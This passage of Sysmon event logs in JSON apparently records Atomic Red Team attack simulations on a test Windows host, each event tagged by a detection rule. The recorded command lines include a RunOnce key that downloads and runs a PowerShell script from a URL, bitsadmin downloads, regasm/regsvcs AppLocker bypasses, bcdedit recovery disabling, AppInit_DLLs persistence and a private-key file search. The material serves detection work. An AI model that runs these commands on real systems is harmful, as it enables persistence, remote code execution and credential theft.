14:45:06.132"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3601,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.137175Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ProcessId":6472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:06.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3603,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.196458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ParentProcessId":6472,"ProcessGuid":"747F3D96-D772-5D31-0000-001083ED2800","ProcessId":6120,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:06.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3604,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.213488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`\")\"","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence - via Run key","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun","UtcTime":"2019-07-19 14:45:19.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3607,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:19.483250Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Startup Folder File Write"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-18 
20:53:13.080","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk","UtcTime":"2019-07-19 14:45:31.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3609,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:31.287863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ProcessId":5800,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:55.672"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3613,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.681219Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D7A3-5D31-0000-001081B22900","ParentProcessId":5800,"ProcessGuid":"747F3D96-D7A3-5D31-0000-0010D2B42900","ProcessId":6176,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:55.694"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3614,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:55.699293Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D7BB-5D31-0000-0010D5092A00","ProcessId":1060,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:46:19.479"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3619,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:46:19.484316Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence or CredAccess - Lsa NotificationPackge","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Notification Packages","UtcTime":"2019-07-19 14:47:21.917"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3632,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:21.972037Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["New DLL Added to AppInit_DLLs Registry Key"],"event":{"Event":{"EventData":{"Details":"C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D809-5D31-0000-00105C262B00","ProcessId":6056,"RuleName":"Persistence - 
AppInit","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs","UtcTime":"2019-07-19 14:47:37.136"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3635,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:37.147054Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001064AD2B00","ParentProcessId":6508,"ProcessGuid":"747F3D96-D817-5D31-0000-001097B02B00","ProcessId":396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:47:51.844"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3648,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:51.865963Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Modification of Boot Configuration"],"event":{"Event":{"EventData":{"CommandLine":"bcdedit.exe /set {default} recoveryenabled no","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Boot Configuration Data Editor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AA1B1FDD00B453CFC690357F5AF930EE6D4C19BB,MD5=7BCA6114F94639C9DAAB4BA4E668FBD0,SHA256=1ADEA035FBFF2FC188FF4CD27076BED9E03DB5ECEFFBD59F875A2A1FEEFB16F0,IMPHASH=2137581C3B28D7B500B0C8EB08EE2057","Image":"C:\\Windows\\System32\\bcdedit.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bcdedit.exe /set {default} recoveryenabled no\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D817-5D31-0000-001049B42B00","ParentProcessId":6216,"ProcessGuid":"747F3D96-D817-5D31-0000-0010B7B62B00","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:47:51.927"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3650,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:47:52.010791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D824-5D31-0000-001023F42B00","ParentProcessId":6736,"ProcessGuid":"747F3D96-D824-5D31-0000-001075F62B00","ProcessId":1540,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:04.122"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3655,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:04.131410Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Windows\\Temp\\bitsadmin_flag.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D83E-5D31-0000-0010A2D72E00","ParentProcessId":4036,"ProcessGuid":"747F3D96-D83E-5D31-0000-0010AAD92E00","ProcessId":3732,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:30.796"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3660,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:30.807486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ProcessId":888,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:57.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3677,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.524876Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-001045922F00","ProcessId":6220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:57.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3678,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.557947Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Discover Private Keys"],"event":{"Event":{"EventData":{"CommandLine":"findstr /e .key","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Find String (QGREP) Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=393F2422D22079BFB0022598D70BEB294F2024F4,MD5=DC0816790EFA08AA5B55C1EECFDDB525,SHA256=750AB5E1F3EB18CC42A4A4C7BAB27753F6B26FB9752AD3861833753091044281,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F","Image":"C:\\Windows\\System32\\findstr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-00109E932F00","ProcessId":948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:48:57.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3679,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.570057Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 